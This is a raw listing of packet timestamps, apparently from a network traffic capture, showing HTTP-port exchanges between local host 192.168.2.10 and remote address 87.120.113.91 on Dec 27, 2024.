                                                        Dec 27, 2024 14:53:43.781256914 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.781464100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.781507015 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.781915903 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.781929016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.781963110 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.782774925 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.782897949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.782934904 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.783523083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.783633947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.783669949 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.784396887 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.784498930 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.784533978 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.785245895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.785358906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.785398006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.786145926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.786212921 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.786251068 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.786973000 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.787062883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.787095070 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.788022995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.788170099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.788216114 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.788963079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.789108038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.789145947 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.789767981 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.789875031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.789911032 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.792022943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.793140888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.793191910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.793421984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.793441057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.793452978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.793466091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.793472052 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.793478966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.793493032 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.793503046 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.793524981 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.794305086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.794436932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.794477940 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.795103073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.795262098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.795295000 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.796041965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.796206951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.796247005 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.796801090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.796955109 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.796991110 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.797640085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.840125084 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.840142965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.840210915 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.840250969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.840290070 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.840369940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.841460943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.841497898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.841573954 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.841959953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.841994047 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.841998100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.842680931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.842721939 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.842776060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.843466043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.843507051 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.843604088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.844311953 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.844356060 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.844459057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.845139027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.845172882 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.845428944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.845562935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.845602989 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.846332073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.846456051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.846493006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.847208977 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.847323895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.847363949 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.848092079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.848156929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.848191977 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.848882914 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.848989964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.849030018 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.849793911 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.849844933 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.849884033 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.850593090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.850656033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.850693941 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.851471901 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.851587057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.851643085 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.852319002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.852478027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.852519035 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.853209019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.853307962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.853359938 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.854046106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.854149103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.854190111 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.854892969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.855081081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.855122089 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.855860949 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.855933905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.855998993 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.856623888 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.856801987 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.856846094 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.857532024 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.857649088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.857686043 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.858385086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.858525991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.858562946 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.859225035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.859337091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.859374046 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.947485924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.947500944 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.947577000 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.947637081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.947747946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.947796106 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.948474884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.948611975 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.948652983 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.949367046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.949443102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.949486971 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.976527929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.976541996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.976613998 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.976689100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.976774931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.976816893 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.977530956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.977698088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.977740049 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.978405952 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.978497982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.978539944 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.979249001 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.979470968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.979513884 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.980114937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.980226040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.980267048 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.980952978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.981080055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.981121063 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.981748104 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.981863976 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.981906891 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.982549906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.982671976 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.982707024 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.983412981 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.983474016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.983516932 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.984230995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.984384060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.984427929 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.985033035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.985161066 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.985197067 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.985846996 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.985974073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.986011982 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.986654997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.986793995 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.986833096 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.987462044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.987571001 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.987610102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.988281012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.988418102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.988460064 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.989104986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.989216089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.989257097 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.989918947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.990034103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.990082979 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.990775108 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.990865946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.990907907 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.991621017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.991725922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.991765976 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.992410898 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.992495060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.992533922 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.993197918 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.993314028 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.993355036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.994057894 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.994139910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.994179010 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.994868040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.994939089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.994975090 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.995693922 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.995745897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.995784998 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.996495962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.996567011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.996609926 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:43.997303963 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.997442007 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:43.997473001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.041629076 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.041677952 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.041731119 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.041841984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.041982889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.042028904 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.042654037 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.042793989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.042833090 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.043561935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.043597937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.043639898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.044333935 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.044442892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.044497967 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.045212984 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.045433044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.045474052 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.045950890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.046075106 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.046116114 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.046513081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.046602964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.046644926 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.047286034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.047393084 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.047441006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.048135042 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.048190117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.048230886 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.048959017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.049159050 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.049205065 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.049813032 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.049909115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.049953938 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.050578117 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.050792933 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.050832987 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.051441908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.051513910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.051561117 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.052249908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.052395105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.052439928 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.053067923 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.053221941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.053267956 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.053857088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.053962946 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.054006100 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.054749966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.054819107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.054864883 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.055521965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.055629015 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.055669069 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.056277990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.056477070 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.056520939 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.057143927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.057286024 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.057323933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.057934046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.058056116 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.058099031 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.058808088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.058861971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.058911085 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.059581041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.059653044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.059701920 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.149060965 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.149125099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.149202108 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.149444103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.149566889 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.149620056 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.150268078 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.150340080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.150389910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.151170969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.178271055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.178292036 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.178385019 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.178461075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.178504944 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.178546906 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.179284096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.179332018 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.179358959 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.180200100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.180212975 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.180257082 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.180890083 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.180927992 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.181102991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.181775093 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.181818008 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.181860924 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.182585955 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.182624102 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.182634115 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.183370113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.183406115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.183522940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.184174061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.184217930 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.184580088 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.185060978 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.185100079 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.185121059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.185863018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.185900927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.185995102 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.186723948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.186743975 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.186757088 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.187444925 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.187477112 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.187570095 CET804972187.120.113.91192.168.2.10
